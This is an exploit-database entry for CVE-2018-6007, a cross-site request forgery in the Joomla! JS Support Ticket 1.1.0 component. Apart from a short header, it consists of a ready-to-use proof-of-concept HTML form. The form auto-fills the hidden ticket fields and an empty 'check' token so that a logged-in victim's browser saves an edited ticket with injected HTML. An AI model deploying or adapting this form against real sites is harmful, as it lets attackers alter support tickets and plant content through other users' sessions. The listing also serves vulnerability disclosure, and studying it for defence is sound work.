Joomla! JS Support Ticket 1.1.0 Cross Site Request Forgery

2018-01-28T00:00:00
ID PACKETSTORM:146135
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-01-28T00:00:00

Description

                                        
                                            `<!--  
# # # # #  
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery  
# Dork: N/A  
# Date: 27.01.2018  
# Vendor Homepage: http://www.joomsky.com/  
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/  
# Software Download: http://joomsky.com/46/download/1.html  
# Version: 1.1.0  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-6007  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability implication allows an attacker to inject html code, edit ticket etc..  
#   
# Proof of Concept:   
-->  
  
<html>  
<body>  
  
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">  
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">  
<p>[CODE]</p>  
</textarea><br>  
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">  
<input type="hidden" name="id" id="id" value="1" />  
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />  
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />  
<input type="hidden" name="c" id="c" value="ticket" />  
<input type="hidden" name="task" id="task" value="saveticket" />  
<input type="hidden" name="uid" id="uid" value="521" />  
<input type="hidden" name="view" id="view" value="ticket" />  
<input type="hidden" name="layout" id="layout" value="formticket" />  
<input type="hidden" name="check" id="check" value="" />  
<input type="hidden" name="option" id="option" value="com_jssupportticket" />  
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>  
<input type="hidden" name="update" id="update" value=""/>  
</form>  
  
</body>  
</html>  
  
`